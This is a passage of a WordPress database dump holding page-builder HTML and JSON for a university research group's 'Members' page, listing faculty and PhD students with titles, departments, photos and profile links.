style-local-182-c410-outer\">\n            <div data-colibri-id=\"182-c410\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c410 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c411\" class=\"d-block style-913 style-local-182-c411 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c411-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c411-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c412\" class=\"h-global-transition-all h-heading style-914 style-local-182-c412 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c412\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c413\" class=\"h-text h-text-component style-915 style-local-182-c413 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c414\" class=\"style-917 style-local-182-c414 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-09-29 22:13:21','2023-09-30 02:13:21','',182,'https://gsudice.dataconn.net/?p=1611',0,'revision','',0),(1617,1,'2023-09-29 22:15:14','2023-09-30 02:15:14','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c427\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c427\",\"index\":0,\"id\":\"182-c428\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-headshot.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":629,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c427\",\"index\":0,\"id\":\"182-c429\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c427\",\"index\":2,\"id\":\"182-c430\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c427\",\"index\":1,\"id\":\"182-c431\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c427\",\"index\":1,\"id\":\"182-c432\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c433\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c433\",\"index\":0,\"id\":\"182-c434\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Portrait-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1409,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c433\",\"index\":0,\"id\":\"182-c435\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c433\",\"index\":2,\"id\":\"182-c436\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c433\",\"index\":1,\"id\":\"182-c437\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c433\",\"index\":1,\"id\":\"182-c438\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c439\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c439\",\"index\":0,\"id\":\"182-c440\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c439\",\"index\":0,\"id\":\"182-c441\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c439\",\"index\":2,\"id\":\"182-c442\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c439\",\"index\":1,\"id\":\"182-c443\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c439\",\"index\":1,\"id\":\"182-c444\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c445\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c445\",\"index\":0,\"id\":\"182-c446\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-SRM-360x360-1.png\",\"caption\":{\"text\":\"\"},\"imageId\":1601,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c445\",\"index\":0,\"id\":\"182-c447\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c445\",\"index\":2,\"id\":\"182-c448\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c445\",\"index\":1,\"id\":\"182-c449\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c445\",\"index\":1,\"id\":\"182-c450\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c455\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c455\",\"index\":0,\"id\":\"182-c456\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c455\",\"index\":0,\"id\":\"182-c457\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c455\",\"index\":2,\"id\":\"182-c458\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c455\",\"index\":1,\"id\":\"182-c459\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c455\",\"index\":1,\"id\":\"182-c460\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c461\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c461\",\"index\":0,\"id\":\"182-c462\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c461\",\"index\":0,\"id\":\"182-c463\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c461\",\"index\":2,\"id\":\"182-c464\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c461\",\"index\":1,\"id\":\"182-c465\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c461\",\"index\":1,\"id\":\"182-c466\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c467\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c467\",\"index\":0,\"id\":\"182-c468\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c467\",\"index\":0,\"id\":\"182-c469\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c467\",\"index\":2,\"id\":\"182-c470\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c467\",\"index\":1,\"id\":\"182-c471\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c467\",\"index\":1,\"id\":\"182-c472\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c473\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c473\",\"index\":0,\"id\":\"182-c474\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c473\",\"index\":0,\"id\":\"182-c475\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c473\",\"index\":2,\"id\":\"182-c476\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c473\",\"index\":1,\"id\":\"182-c477\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c473\",\"index\":1,\"id\":\"182-c478\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c479\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c479\",\"index\":0,\"id\":\"182-c480\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c479\",\"index\":0,\"id\":\"182-c481\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c479\",\"index\":2,\"id\":\"182-c482\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c479\",\"index\":1,\"id\":\"182-c483\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c479\",\"index\":1,\"id\":\"182-c484\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c426\",\"parentId\":\"182-c425\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c425\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c453\",\"parentId\":\"182-c452\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c452\",\"parentId\":\"182-c451\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c451\",\"parentId\":\"182-c425\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c78\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c78\",\"index\":0,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sundos_Al_Subhi-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1592,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c78\",\"index\":0,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c78\",\"index\":2,\"id\":\"182-c81\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c78\",\"index\":3,\"id\":\"182-c246\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c78\",\"index\":1,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c72\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c72\",\"index\":0,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c72\",\"index\":0,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c72\",\"index\":2,\"id\":\"182-c75\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c72\",\"index\":3,\"id\":\"182-c245\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c72\",\"index\":1,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c84\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c84\",\"index\":0,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c84\",\"index\":0,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"prop